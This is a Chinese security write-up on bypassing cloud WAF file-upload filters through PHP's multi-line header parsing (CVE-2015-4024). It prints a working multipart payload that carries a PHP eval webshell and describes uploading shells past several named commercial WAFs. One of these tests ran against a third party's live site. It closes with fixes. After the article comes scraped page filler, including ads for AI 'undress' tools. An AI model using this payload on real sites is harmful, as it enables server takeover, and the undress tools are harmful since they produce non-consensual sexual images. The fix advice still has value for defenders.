0x00 背景介绍
今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版: http://drops.wooyun.org/papers/6077 ,英文版 : https://bugs.php.net/bug.php?id=69364 。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。
目前国内外流行的云WAF厂商有如百度云加速,360网站卫士,加速乐,云盾等。因为PHP远程dos漏洞及PHP官方修复方案的特点,我们成功利用该漏洞绕过了当前主流WAF的文件上传防御,例如百度云加速、360网站卫士、知道创于加速乐、安全狗。
接下来,我们以PHP为例,详细解析我们的绕过方法。
0x01 绕过WAF的原理
根据PHP DOS漏洞原理,在 multipart_buffer_headers 函数解析header对应value时,value值存在n行。每行的字符串以空白符开头或不存字符':',都触发以下合并value的代码块。那么解析header的value就要执行(n-1)次合并value的代码块,从而导致DOS。
#!phpprev_len= strlen(prev_entry.value); cur_len= strlen(line); entry.value= emalloc(prev_len + cur_len + 1); //1次分片内存 memcpy(entry.value,prev_entry.value, prev_len); //1次拷贝 memcpy(entry.value+ prev_len, line, cur_len); //1次拷贝 entry.value[cur_len+ prev_len] = '\0'; entry.key= estrdup(prev_entry.key); zend_llist_remove_tail(header);//1次内存释放
而PHP官方修复方案,在进行合并时,避免重复拷贝,从而避免DOS。绕过WAF的关键在于,PHP multipart_buffer_headers 函数解析header对应value时,value值存在多行。每行的字符串以空白符开头或不存字符':',将进行合并。而WAF在解析文件上传的文件名时,没有考虑协议兼容,不进行多行合并,就可以被绕过。
根据原理构造绕过WAF文件上传防御的payload,WAF解析到的文件名为”test3.jpg”,而PHP解析到的文件名是“ test3.jpg\nf/shell.php ”,因为”/”是目录分隔符,上传的文件名变为shell.php。以下是绕过paylaod、测试脚本、paylaod进行文件上传的效果图。
WAF绕过payload:
#!php------WebKitFormBoundaryx7V4AhipWn8ig52yContent-Disposition: form-data; name="file"; filename="test3.jpg\nsf/shell.phpContent-Type: application/octet-stream<?php eval($_GET['c'])?>------WebKitFormBoundaryx7V4AhipWn8ig52y
文件上传功能测试脚:
#!php<?php $name = $_FILES['file']['name']; echo $name; echo "\n"; move_uploaded_file($_FILES['file']['tmp_name'] , '/usr/local/nginx/html/upload/'.$_FILES['file']['name']); echo "upload success! ".$_FILES['file']['name']; echo "\n"; echo strlen($_FILES['file']['name']);?>
Payload能够正常上传
0x02 绕过WAF实战
笔者通过搭建自己的测试站,接入360网站卫士和加速乐,验证绕过WAF文件上传防御的方法。
2.1 绕过360网站卫士
步骤1,验证网站已被360网站卫士防御,拦截了直接上传PHP文件的请求。
步骤2:成功绕过360网站卫士,上传shell成功,文件是apo.php。在该请求中,有没有Content-Type不影响绕过。
2.2 绕过知道创宇加速乐
步骤一:验证网站被加速乐保护,拦截了直接上传PHP文件的请求。
步骤二:
成功绕过加速乐,上传shell,文件是syt.php。
2.3 绕过百度云加速
百度云加速与CloudFlare,从百度匀加速拦截页面可以看出使用的是CloudFlare. 但是估计有本地化,百度云加速应该是百度和CloudFlare共同产物吧。测试百度没有搭建自己的测试环境,找了个接入了百度云加速的站进行测试。
步骤一:验证网站被百度云加速保护,拦截了直接上传PHP文件的请求。
步骤二:成功绕过云加速
2.4 安全狗的测试
用该方法测试安全狗的文件上传,
#!bashContent-Disposition: form-data; name="file"; filename="2.phpaa:Content-Type: image/jpeg
php与aa这间的是 %0a ,处理请求的Apache进程直接崩溃。感觉可以溢出,没有深入。
2.5 CloudFlare的测试
为了测试能否绕过国外版的CloudFlare,特意买了它的服务。结果,在规则全开的情况下,竞然不拦截文件上传。
2.6 Amazon WAF
亚马逊的WAF没有规则,所有规则需要用户配置。在配置的选项里,没有文件上传的选项,所以也就没有绕过的说法。国内WAF和国外WAF的区别挺大,为什么这么设计还是值得深思。
我们还绕过了其他WAF,这里不一一列举。
0x03 扩展—更多的工作
3.1 分析filename其他字符的绕过
同理,我们发现除了双引号外,使用单引号也能绕过WAF的防御,并实现文件上传。
#!php------WebKitFormBoundaryx7V4AhipWn8ig52yContent-Disposition: form-data; name="file"; filename='test3.jpg\nsf/shell.phpContent-Type: application/octet-stream<?php eval($_GET['c'])?>------WebKitFormBoundaryx7V4AhipWn8ig52y
3.2 分析其他应用脚本语言
我们也发现jsp解析也有自己的特点,同时可被用于绕过WAF。暂时未测试asp,aspx,python等常用的WEB应用脚本语言。
0x04 修复方案
4.1 修复方案一
解析文件上传请求时,如果发现请求不符合协议规范,则拒绝请求。可能会产生误拦截,需要评估误拦截的影响范围。
4.2 修复方案二
兼容php的文件解析方式,解析文件名时,以单引号或双引号开头,并且对应的单引号或双引号闭合。
0x05 总结
本文通过Review PHP远程dos漏洞(CVE-2015-4024),并利用该特性绕过现有WAF的文件上传防御,成功上传shell。 更重要的价值,提供给我们一个绕过WAF的新思路,一种研究新方向:利用后端应用脚本与WAF行为的差异绕过WAF的防御。总的来说,一款优秀的WAF应该能够处理兼容WEB应用容器、标准协议、web服务器这间的差异。

PHP仍然流行的原因是其易用性、靈活性和強大的生態系統。 1)易用性和簡單語法使其成為初學者的首選。 2)與web開發緊密結合,處理HTTP請求和數據庫交互出色。 3)龐大的生態系統提供了豐富的工具和庫。 4)活躍的社區和開源性質使其適應新需求和技術趨勢。

PHP和Python都是高層次的編程語言,廣泛應用於Web開發、數據處理和自動化任務。 1.PHP常用於構建動態網站和內容管理系統,而Python常用於構建Web框架和數據科學。 2.PHP使用echo輸出內容,Python使用print。 3.兩者都支持面向對象編程,但語法和關鍵字不同。 4.PHP支持弱類型轉換,Python則更嚴格。 5.PHP性能優化包括使用OPcache和異步編程,Python則使用cProfile和異步編程。

PHP主要是過程式編程,但也支持面向對象編程(OOP);Python支持多種範式,包括OOP、函數式和過程式編程。 PHP適合web開發,Python適用於多種應用,如數據分析和機器學習。

PHP起源於1994年,由RasmusLerdorf開發,最初用於跟踪網站訪問者,逐漸演變為服務器端腳本語言,廣泛應用於網頁開發。 Python由GuidovanRossum於1980年代末開發,1991年首次發布,強調代碼可讀性和簡潔性,適用於科學計算、數據分析等領域。

PHP適合網頁開發和快速原型開發,Python適用於數據科學和機器學習。 1.PHP用於動態網頁開發,語法簡單,適合快速開發。 2.Python語法簡潔,適用於多領域,庫生態系統強大。

PHP在現代化進程中仍然重要,因為它支持大量網站和應用,並通過框架適應開發需求。 1.PHP7提升了性能並引入了新功能。 2.現代框架如Laravel、Symfony和CodeIgniter簡化開發,提高代碼質量。 3.性能優化和最佳實踐進一步提升應用效率。

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

PHP類型提示提升代碼質量和可讀性。 1)標量類型提示:自PHP7.0起,允許在函數參數中指定基本數據類型,如int、float等。 2)返回類型提示:確保函數返回值類型的一致性。 3)聯合類型提示:自PHP8.0起,允許在函數參數或返回值中指定多個類型。 4)可空類型提示:允許包含null值,處理可能返回空值的函數。


熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

記事本++7.3.1
好用且免費的程式碼編輯器

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

Dreamweaver Mac版
視覺化網頁開發工具

WebStorm Mac版
好用的JavaScript開發工具

禪工作室 13.0.1
強大的PHP整合開發環境